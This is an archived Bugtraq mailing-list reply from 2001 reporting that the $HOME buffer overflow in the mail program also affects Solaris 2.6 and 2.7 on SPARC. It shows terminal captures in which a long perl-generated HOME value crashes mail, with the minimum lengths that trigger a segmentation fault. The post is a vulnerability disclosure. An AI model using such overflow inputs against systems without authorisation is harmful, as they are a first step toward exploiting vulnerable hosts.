[20882] in bugtraq
Re: $HOME buffer overflow in SunOS 5.8 x86
daemon@ATHENA.MIT.EDU (SChoe)
Wed Jun 6 00:59:16 2001
Date: Tue, 5 Jun 2001 14:56:49 -1000 (HST)
From: SChoe <schoe@CheapTickets.COM>
To: <bugtraq@securityfocus.com>
Cc: <schoe@CheapTickets.COM>, <tdunlap@CheapTickets.COM>,
<bhunter@CheapTickets.COM>, <ssakata@CheapTickets.COM>
Message-ID: <Pine.GSO.4.31.0106051442250.24707-100000@payt01.svl.corp.cheaptickets.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
> Solaris/sparc appears not to be vulnerable.
Solaris 2.6/2.7 SPARC are also susceptable
to /usr/bin/mail buffer overflow. Here are
the minimum buffer's usable to produce
segmentation faults.
<---------------------snip--------------------->
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export HOME=`perl -e 'print "A"x1293'`
bash-2.04$ mail a
^C
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->
<---------------------snip--------------------->
SunOS <hostname> 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-4
bash-2.04$ export HOME=`perl -e 'print "A"x1099'`
bash-2.04$ mail a
^C
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->
+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
| |
| Ph: 808/945.7439 Fax: 808/946.5993 |
:--------------------------------------------------+
